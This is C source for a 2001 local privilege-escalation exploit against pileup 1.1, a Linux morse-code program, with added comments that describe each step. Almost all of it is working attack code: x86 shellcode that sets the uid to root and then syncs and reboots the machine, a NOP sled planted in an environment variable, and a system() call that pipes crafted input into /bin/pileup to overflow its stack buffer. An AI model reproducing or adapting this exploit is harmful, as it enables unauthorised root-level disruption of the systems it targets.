A local buffer overflow exploit for pileup v1.1 and possibly other versions. It gains root (uid=0).
03ec951fe5e15a9672e1681575352a376e8e0714adebdcf27018783bce3aee5e
/* (pileup 1.1[?]) reboot_via(root[uid=0]) local buffer overflow exploit.
*
* Author: Cody Tubbs (loophole of hhp).
* Site: www.hhp-programming.net
* Email: pigspigs@yahoo.com
* Date: 5/4/2001. 12:47:17AM CST.
*
* Tested on Slackware Linux 7.1 / 2.4.5 (x86).
* Debian 2.* (x86).
*
* Info: pileup is a morse code (CW) program for radio amateurs.
* it simulates up to 9 stations calling at various CW
* speeds, tones and volumes.
* (I stumbled upon this software one night on a mission
* to learn morse code.... I sort of got side tracked.)
*
* Because scanf() delimiters got in the way, execve shellcode was not used.
* Instead this will reboot the exploited system.
*/
#include <stdio.h>
#define PATH "/bin/pileup" // Change to direct path if needed.
#define OFFSET 0 // Worked for me.
#define ALLIGN 0 // Don't change.
#define NOP 0x90 // x86 No OPeration.
#define DBUF 20 // 16+4(ebp)+4(eip)=24.
#define DAT "calls.dat" // Required for exploitation.
/* Raw x86 machine code that main() places after a NOP sled in the UPEX
 * environment variable. The per-line annotations are the original author's;
 * they are kept as given and were not independently verified here. */
static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17" // setuid(0)/setgid(0)
"\xcd\x80\x66\x31\xc0\x66" // ''
"\x31\xdb\xb0\x2e\xcd\x80" // ''
//Sync+Reboot shellcode by bighawk[@warfare.com]
"\x31\xc0" // xor eax, eax
"\xb0\x24" // mov al, 36
"\xcd\x80" // int 80h
"\xb0\x58" // mov al, 0x58
"\xbb\xad\xde\xe1\xfe" // mov ebx, 0xfee1dead
"\xb9\x69\x19\x12\x28" // mov ecx, 0x28121969
"\xba\x67\x45\x23\x01" // mov edx, 0x1234567
"\xcd\x80"; // int 80h
/* Sample the current stack pointer. The function body is only an inline
 * asm statement that copies %esp into %eax and has no C return statement;
 * the caller receives whatever is in %eax under the x86 convention. That
 * is compiler/platform behaviour, not something the C standard defines. */
long get_sp(void){__asm__("movl %esp,%eax");}
/* Write the banner and usage text to stderr.
 * heh: program name shown in the usage line (main passes argv[0]). */
void workit(char *heh){
	fputs("(pileup) reboot(root[uid=0]) local exploit.\n", stderr);
	fputs("Author: Cody Tubbs (loophole of hhp).\n", stderr);
	fprintf(stderr, "Usage: %s [offset] [allign(0..3)]\n", heh);
}
/* Entry point (implicit int return type, pre-C99 style).
 * argv[1] (optional): offset subtracted from the sampled stack pointer.
 * argv[2] (optional): number of leading filler bytes written into eipeip.
 * Side effects visible in this function: deletes and recreates "calls.dat"
 * in the current directory, sets the UPEX environment variable, and runs two
 * shell commands through system(). */
main(int argc, char **argv){
/* heh is declared here but never used in this function. */
char eipeip[DBUF],buffer[7192],heh[DBUF+1];
char go[DBUF+22];
FILE *calls;
int i,offset,allign;
long address;
workit(argv[0]);
/* Replace calls.dat with a one-line marker file. The fopen() result is not
 * checked before it is written to. */
unlink(DAT);
calls=fopen(DAT,"w");
fprintf(calls,"OWNED\n");
fclose(calls);
/* Command-line overrides; atoi() reports no parse errors. */
if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}
address=get_sp()-offset;
/* allign filler bytes (0x69), then address repeated every 4 bytes up to
 * DBUF. No NUL terminator is written to eipeip. */
if(allign>0){for(i=0;i<allign;i++){eipeip[i]=0x69;}}//0x69.DOOT:D
for(i=allign;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}
/* NOP fill, shellcode appended, "UPEX=" prefix overwriting the first 5
 * bytes; the whole buffer is then exported with putenv(). NOTE(review):
 * strlen() is applied to eipeip, which has no terminator, and buffer is
 * never explicitly NUL-terminated either. */
for(i=0;i<(7192-strlen(shellcode)-strlen(eipeip));i++){buffer[i]=NOP;}
memcpy(buffer+i,shellcode,strlen(shellcode));
memcpy(buffer,"UPEX=",5);
putenv(buffer);
fprintf(stderr,"Ret-addr: %#x, offset: %d, allign: %d.\n",address,offset,allign)
;
/* Both commands run through the shell; the second pipes a scripted answer
 * sequence into PATH. */
system("printf 'Attempting to reboot... adios amig*!';sleep 2");
sprintf(go,"(printf '1\n0\nC\n%s\n0\n')|%s",eipeip,PATH); //netcat style.
system(go);
/* Reached only if the second system() call returns normally. */
printf("Exploitation failed! :(\n");
}